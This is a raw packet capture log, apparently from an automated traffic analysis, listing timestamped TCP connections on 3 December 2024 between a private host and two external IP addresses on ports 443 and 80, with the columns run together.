                                                                                                                      Dec 3, 2024 08:54:53.287228107 CET49776443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:53.287240028 CET4434977613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:53.287672043 CET49776443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:53.287678003 CET4434977613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:53.287781000 CET4434977913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:53.288037062 CET49779443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:53.288058043 CET4434977913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:53.288367987 CET49779443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:53.288372993 CET4434977913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:53.672812939 CET4434977813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:53.672823906 CET4434977513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:53.672826052 CET4434977513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:53.672838926 CET4434977813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:53.672894001 CET49775443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:53.672916889 CET4434977513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:53.672940969 CET49778443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:53.672956944 CET49775443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:53.672965050 CET4434977813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:53.673007011 CET49778443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:53.673177958 CET49778443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:53.673182964 CET4434977813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:53.673188925 CET49775443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:53.673192978 CET4434977513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:53.673202991 CET49778443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:53.673209906 CET49775443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:53.673367977 CET4434977513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:53.673403025 CET4434977813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:53.673408985 CET4434977513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:53.673428059 CET4434977813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:53.673479080 CET49775443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:53.673499107 CET49778443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:53.676763058 CET49781443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:53.676791906 CET49780443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:53.676806927 CET4434978113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:53.676814079 CET4434978013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:53.676888943 CET49780443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:53.676899910 CET49781443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:53.677030087 CET49781443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:53.677043915 CET4434978113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:53.677177906 CET49780443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:53.677189112 CET4434978013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:53.739726067 CET4434977613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:53.739820957 CET4434977613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:53.739906073 CET49776443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:53.740170002 CET49776443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:53.740185022 CET4434977613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:53.740194082 CET49776443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:53.740199089 CET4434977613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:53.741332054 CET4434977913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:53.741405964 CET4434977913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:53.741480112 CET49779443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:53.741683960 CET49779443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:53.741698027 CET4434977913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:53.741708994 CET49779443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:53.741714954 CET4434977913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:53.743335962 CET49782443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:53.743365049 CET4434978213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:53.743458986 CET49782443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:53.743587971 CET49782443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:53.743607998 CET4434978213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:53.744092941 CET49783443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:53.744144917 CET4434978313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:53.744214058 CET49783443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:53.744369030 CET49783443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:53.744379044 CET4434978313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:55.466422081 CET4434978113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:55.467164993 CET49781443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:55.467200994 CET4434978113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:55.467684984 CET49781443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:55.467690945 CET4434978113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:55.526966095 CET4434978013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:55.527540922 CET49780443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:55.527575016 CET4434978013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:55.528032064 CET49780443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:55.528037071 CET4434978013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:55.596441984 CET4434978313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:55.597094059 CET49783443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:55.597127914 CET4434978313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:55.597580910 CET49783443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:55.597585917 CET4434978313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:55.600132942 CET4434978213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:55.600394964 CET49782443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:55.600419998 CET4434978213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:55.600711107 CET49782443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:55.600716114 CET4434978213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:55.911106110 CET4434978113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:55.911180973 CET4434978113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:55.911281109 CET49781443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:55.911518097 CET49781443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:55.911540031 CET4434978113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:55.911557913 CET49781443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:55.911562920 CET4434978113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:55.915033102 CET49784443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:55.915071011 CET4434978413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:55.915163994 CET49784443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:55.915378094 CET49784443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:55.915396929 CET4434978413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:55.981255054 CET4434978013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:55.981326103 CET4434978013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:55.981395960 CET49780443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:55.981609106 CET49780443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:55.981628895 CET4434978013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:55.981638908 CET49780443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:55.981643915 CET4434978013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:55.984802961 CET49785443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:55.984833956 CET4434978513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:55.985068083 CET49785443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:55.985109091 CET49785443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:55.985115051 CET4434978513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:56.050179958 CET4434978313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:56.050251961 CET4434978313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:56.050309896 CET49783443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:56.050512075 CET49783443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:56.050530910 CET4434978313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:56.050543070 CET49783443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:56.050549030 CET4434978313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:56.053553104 CET4434978213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:56.053618908 CET4434978213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:56.053677082 CET49782443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:56.053678989 CET49786443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:56.053711891 CET4434978613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:56.053783894 CET49786443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:56.053935051 CET49786443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:56.053936005 CET49782443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:56.053942919 CET4434978213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:56.053951025 CET4434978613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:56.053980112 CET49782443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:56.053983927 CET4434978213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:56.056905031 CET49787443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:56.056925058 CET4434978713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:56.056996107 CET49787443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:56.057143927 CET49787443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:56.057154894 CET4434978713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:57.493113041 CET4434977713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:57.493900061 CET49777443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:57.493954897 CET4434977713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:57.494462967 CET49777443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:57.494472027 CET4434977713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:57.695988894 CET4434978413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:57.696634054 CET49784443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:57.696679115 CET4434978413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:57.697118998 CET49784443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:57.697130919 CET4434978413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:57.767756939 CET4434978513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:57.768330097 CET49785443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:57.768352985 CET4434978513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:57.768868923 CET49785443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:57.768873930 CET4434978513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:57.899719000 CET4434978613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:57.900418043 CET49786443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:57.900440931 CET4434978613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:57.901110888 CET49786443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:57.901117086 CET4434978613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:57.904459953 CET4434978713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:57.904853106 CET49787443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:57.904866934 CET4434978713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:57.905257940 CET49787443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:57.905261993 CET4434978713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:57.954727888 CET4434977713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:57.954751968 CET4434977713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:57.954850912 CET49777443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:57.954879045 CET4434977713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:57.955195904 CET49777443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:57.955207109 CET4434977713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:57.955216885 CET49777443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:57.955461979 CET4434977713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:57.955502987 CET4434977713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:57.955542088 CET49777443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:57.958496094 CET49788443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:57.958538055 CET4434978813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:57.958606958 CET49788443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:57.958759069 CET49788443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:57.958769083 CET4434978813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:58.139713049 CET4434978413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:58.139792919 CET4434978413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:58.139861107 CET49784443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:58.140126944 CET49784443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:58.140141964 CET4434978413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:58.140153885 CET49784443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:58.140158892 CET4434978413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:58.143471956 CET49789443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:58.143518925 CET4434978913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:58.143604994 CET49789443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:58.143811941 CET49789443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:58.143827915 CET4434978913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:58.213869095 CET4434978513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:58.213947058 CET4434978513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:58.213995934 CET49785443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:58.214261055 CET49785443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:58.214282036 CET4434978513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:58.214293003 CET49785443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:58.214299917 CET4434978513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:58.217673063 CET49790443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:58.217741013 CET4434979013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:58.217843056 CET49790443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:58.218103886 CET49790443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:58.218121052 CET4434979013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:58.353218079 CET4434978613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:58.353305101 CET4434978613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:58.353523016 CET49786443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:58.353611946 CET49786443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:58.353632927 CET4434978613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:58.353655100 CET49786443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:58.353661060 CET4434978613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:58.356923103 CET49791443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:58.356976986 CET4434979113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:58.357074022 CET49791443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:58.357259035 CET49791443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:58.357276917 CET4434979113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:58.358290911 CET4434978713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:58.358351946 CET4434978713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:58.358417034 CET49787443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:58.358484030 CET49787443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:58.358501911 CET4434978713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:58.358511925 CET49787443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:58.358517885 CET4434978713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:58.360686064 CET49792443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:58.360726118 CET4434979213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:58.360802889 CET49792443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:58.360939980 CET49792443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:58.360956907 CET4434979213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:59.650479078 CET4972480192.168.2.4199.232.210.172
                                                                                                                      Dec 3, 2024 08:54:59.738843918 CET4434978813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:59.739470005 CET49788443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:59.739499092 CET4434978813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:59.739980936 CET49788443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:59.739989042 CET4434978813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:59.770922899 CET8049724199.232.210.172192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:59.771096945 CET4972480192.168.2.4199.232.210.172
                                                                                                                      Dec 3, 2024 08:54:59.925554037 CET4434978913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:59.926265001 CET49789443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:59.926289082 CET4434978913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:59.926779032 CET49789443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:59.926784992 CET4434978913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:00.171049118 CET4434979113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:00.171066999 CET4434979013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:00.171694040 CET49790443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:00.171699047 CET49791443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:00.171719074 CET4434979113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:00.171726942 CET4434979013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:00.172234058 CET49790443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:00.172245026 CET4434979013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:00.172271013 CET49791443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:00.172276974 CET4434979113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:00.210975885 CET4434979213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:00.211844921 CET49792443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:00.211878061 CET4434979213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:00.212333918 CET49792443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:00.212346077 CET4434979213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:00.247704983 CET4434978813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:00.247771025 CET4434978813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:00.247832060 CET49788443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:00.248123884 CET49788443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:00.248148918 CET4434978813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:00.248163939 CET49788443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:00.248169899 CET4434978813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:00.251614094 CET49794443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:00.251669884 CET4434979413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:00.251774073 CET49794443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:00.251961946 CET49794443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:00.251979113 CET4434979413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:00.492861032 CET4434978913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:00.492933035 CET4434978913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:00.493063927 CET49789443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:00.493361950 CET49789443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:00.493380070 CET4434978913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:00.493390083 CET49789443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:00.493396997 CET4434978913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:00.496740103 CET49795443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:00.496778965 CET4434979513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:00.496875048 CET49795443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:00.497086048 CET49795443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:00.497101068 CET4434979513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:00.616000891 CET4434979013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:00.616080046 CET4434979013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:00.616295099 CET49790443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:00.616422892 CET49790443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:00.616444111 CET4434979013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:00.616482019 CET49790443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:00.616487980 CET4434979013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:00.616900921 CET4434979113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:00.616964102 CET4434979113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:00.617011070 CET49791443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:00.617125034 CET49791443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:00.617136955 CET4434979113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:00.617145061 CET49791443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:00.617149115 CET4434979113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:00.620043993 CET49796443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:00.620069981 CET4434979613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:00.620074034 CET49797443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:00.620100975 CET4434979713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:00.620138884 CET49796443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:00.620177984 CET49797443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:00.620335102 CET49796443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:00.620335102 CET49797443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:00.620346069 CET4434979713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:00.620349884 CET4434979613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:00.664695978 CET4434979213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:00.664755106 CET4434979213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:00.664915085 CET49792443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:00.665038109 CET49792443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:00.665059090 CET4434979213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:00.665067911 CET49792443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:00.665072918 CET4434979213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:00.668500900 CET49798443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:00.668548107 CET4434979813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:00.668627977 CET49798443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:00.668761015 CET49798443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:00.668775082 CET4434979813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.031506062 CET4434979413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.035073042 CET49794443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:02.035115957 CET4434979413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.038609028 CET49794443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:02.038615942 CET4434979413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.343163967 CET4434979513.107.246.63192.168.2.4
